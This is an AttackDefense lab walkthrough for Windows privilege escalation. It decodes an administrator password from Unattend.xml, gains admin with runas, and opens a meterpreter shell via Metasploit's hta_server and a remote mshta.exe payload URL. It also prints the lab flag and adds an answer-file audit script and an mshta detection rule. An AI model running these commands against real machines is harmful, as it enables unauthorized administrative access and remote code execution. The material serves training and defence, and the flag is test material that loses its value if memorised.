Unattended Installation

This document outlines the steps for performing an unattended installation lab focused on Windows security and privilege escalation. It details the use of PowerSploit and PowerUp scripts to identify vulnerabilities, decode an administrator password from an Unattend.xml file, and gain administrative access via a meterpreter shell. The final step involves locating a flag on the target machine after successfully exploiting the system.

Uploaded by

Harlian

Name Unattended Installation

URL https://attackdefense.com/challengedetails?cid=2106

Type Windows Security: Privilege Escalation: Basics

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: Switch to the Attacker Machine to locate a privilege escalation vulnerability.

Step 2: Open a powershell.exe terminal to check the current user.


We are running as the student user. The PowerSploit framework and the PowerUp.ps1 script are
provided.

PowerSploit

“PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration
testers during all phases of an assessment. PowerSploit is comprised of the following modules
and scripts:”

PowerUp.ps1

“PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely
on misconfigurations.”

Source: https://github.com/PowerShellMafia/PowerSploit

Step 3: We will run the PowerUp.ps1 PowerShell script to find a privilege escalation vulnerability.

Commands: powershell.exe
cd .\Desktop\PowerSploit\Privesc\
ls
Step 4: Import the PowerUp.ps1 script and run the Invoke-PrivescAudit function.

Commands: powershell -ep bypass (PowerShell execution policy bypass)
. .\PowerUp.ps1
Invoke-PrivescAudit

The audit output shows that an Unattend.xml file is present on the system. Open the
Unattend.xml file.

Unattend.xml:

Unattend.xml is an answer file for installation. The files may contain encoded or plain-text
credentials and other sensitive information.

Step 5: Reading the Unattend.xml file.

Command: cat C:\Windows\Panther\Unattend.xml


We have discovered an encoded administrator password, i.e. “QWRtaW5AMTIz”.

Step 6: Decoding the administrator password using PowerShell.

Commands:
$password='QWRtaW5AMTIz'
$password=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($password))
echo $password

The administrator password is “Admin@123”.
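As an added example that is not part of the lab, this is the check an administrator would run to find leftover answer files before someone else does: it walks the usual sysprep/setup locations (only C:\Windows\Panther\Unattend.xml comes from the lab; the other paths are assumed), lists every Password element, and decodes Base64 values the way Step 6 does. The function names Decode-AnswerFilePassword and Get-AnswerFileExposure are chosen here.

```powershell
# Added example, not from the lab: audit leftover answer files for credentials.
# Only C:\Windows\Panther\Unattend.xml is from the lab; the other paths are
# assumed common sysprep/setup locations.
$candidates = @(
    'C:\Windows\Panther\Unattend.xml',
    'C:\Windows\Panther\Unattend\Unattend.xml',
    'C:\Windows\System32\Sysprep\Unattend.xml',
    'C:\Windows\System32\Sysprep\sysprep.xml',
    'C:\unattend.xml'
)

function Decode-AnswerFilePassword {
    param([string]$Value, [bool]$PlainText)
    if ($PlainText) { return $Value }
    try { $bytes = [System.Convert]::FromBase64String($Value) }
    catch { return $Value }   # not Base64 at all: report the raw value
    # Sysprep itself writes UTF-16LE with the literal suffix "Password";
    # the lab file is plain UTF-8 Base64 ("QWRtaW5AMTIz"). Handle both.
    if ($bytes.Length % 2 -eq 0) {
        $utf16 = [System.Text.Encoding]::Unicode.GetString($bytes)
        if ($utf16.EndsWith('Password')) {
            return $utf16.Substring(0, $utf16.Length - 'Password'.Length)
        }
    }
    return [System.Text.Encoding]::UTF8.GetString($bytes)
}

function Get-AnswerFileExposure {
    param([string[]]$Paths)
    foreach ($path in ($Paths | Where-Object { Test-Path -LiteralPath $_ })) {
        $xml = [xml](Get-Content -Raw -LiteralPath $path)
        # local-name() avoids declaring the urn:schemas-microsoft-com:unattend namespace
        foreach ($pw in $xml.SelectNodes("//*[local-name()='Password']")) {
            $valueNode = $pw.SelectSingleNode("*[local-name()='Value']")
            $plainNode = $pw.SelectSingleNode("*[local-name()='PlainText']")
            if (-not $valueNode) { continue }
            $plain = ($null -ne $plainNode) -and ($plainNode.InnerText -eq 'true')
            [pscustomobject]@{
                File      = $path
                Account   = $pw.ParentNode.LocalName   # e.g. AdministratorPassword
                PlainText = $plain
                Decoded   = Decode-AnswerFilePassword -Value $valueNode.InnerText -PlainText $plain
            }
        }
    }
}

Get-AnswerFileExposure -Paths $candidates | Format-Table -AutoSize
```

Any row returned is a file that should be deleted or scrubbed; on the lab host the row for C:\Windows\Panther\Unattend.xml decodes to Admin@123.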

Step 7: We are running a command prompt as the administrator user using the discovered credentials.
Commands: runas.exe /user:administrator cmd
Admin@123
whoami

We are running cmd.exe as an administrator.

Switch to the Kali Machine

Step 8: Running the hta_server module to gain the meterpreter shell. Start msfconsole.

Commands:
msfconsole -q
use exploit/windows/misc/hta_server
exploit

“This module hosts an HTML Application (HTA) that when opened will run a payload via
PowerShell.”
Copy the generated payload, i.e. “http://10.10.0.2:8080/6Nz7aySfPN.hta”, and run it in cmd.exe
with the mshta command to gain the meterpreter shell.

Note: You need to execute the below payload in cmd.exe.

Switch to Target Machine

Step 9: Gaining a meterpreter shell.

Commands:

Note: You need to use your own Metasploit HTA server link.

Payload: mshta.exe http://10.10.0.2:8080/6Nz7aySfPN.hta

We can expect a meterpreter shell.
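From the defender's side, the Step 9 launch is easy to spot: mshta.exe is started with a remote URL on its command line. The following is an added example (not part of the lab) that runs that rule over constructed process-creation records shaped like Sysmon Event ID 1 fields; the records are sample data, not real logs, and Find-RemoteHtaLaunch is a name chosen here.

```powershell
# Added example, not from the lab: detection logic for the Step 9 technique,
# mshta.exe started with a remote HTA URL. The records below are constructed
# samples shaped like Sysmon Event ID 1 fields (Image, ParentImage, CommandLine).
$events = @(
    [pscustomobject]@{ Image = 'C:\Windows\System32\cmd.exe';   ParentImage = 'C:\Windows\explorer.exe';         CommandLine = 'cmd.exe' },
    [pscustomobject]@{ Image = 'C:\Windows\System32\mshta.exe'; ParentImage = 'C:\Windows\System32\cmd.exe';     CommandLine = 'mshta.exe http://10.10.0.2:8080/6Nz7aySfPN.hta' },
    [pscustomobject]@{ Image = 'C:\Windows\System32\mshta.exe'; ParentImage = 'C:\Windows\explorer.exe';         CommandLine = '"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\setup.hta"' },
    [pscustomobject]@{ Image = 'C:\Windows\System32\runas.exe'; ParentImage = 'C:\Windows\System32\cmd.exe';     CommandLine = 'runas.exe /user:administrator cmd' }
)

function Find-RemoteHtaLaunch {
    param([object[]]$Events)
    foreach ($e in $Events) {
        $isMshta  = [System.IO.Path]::GetFileName($e.Image) -ieq 'mshta.exe'
        # A local .hta path is not flagged; a URL scheme in the arguments is.
        $isRemote = $e.CommandLine -match '(?i)\b(https?|ftp)://'
        if ($isMshta -and $isRemote) {
            [pscustomobject]@{
                Rule        = 'mshta.exe launched with remote HTA'
                Parent      = $e.ParentImage
                CommandLine = $e.CommandLine
            }
        }
    }
}

Find-RemoteHtaLaunch -Events $events | Format-List
```

Only the second record is reported; the third (a locally installed .hta) and the runas.exe launch pass the filter.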


Step 10: Find the flag.

Commands:
sessions -i 1
cd /
cd C:\\Users\\Administrator\\Desktop
dir
cat flag.txt

This reveals the flag to us.

Flag: 097ab83639dce0ab3429cb0349493f60

References

1. Answer files (unattend.xml) (https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/update-windows-settings-and-scripts-create-your-own-answer-file-sxs)
2. Metasploit (https://www.metasploit.com/)
3. HTA Web Server (https://www.rapid7.com/db/modules/exploit/windows/misc/hta_server)
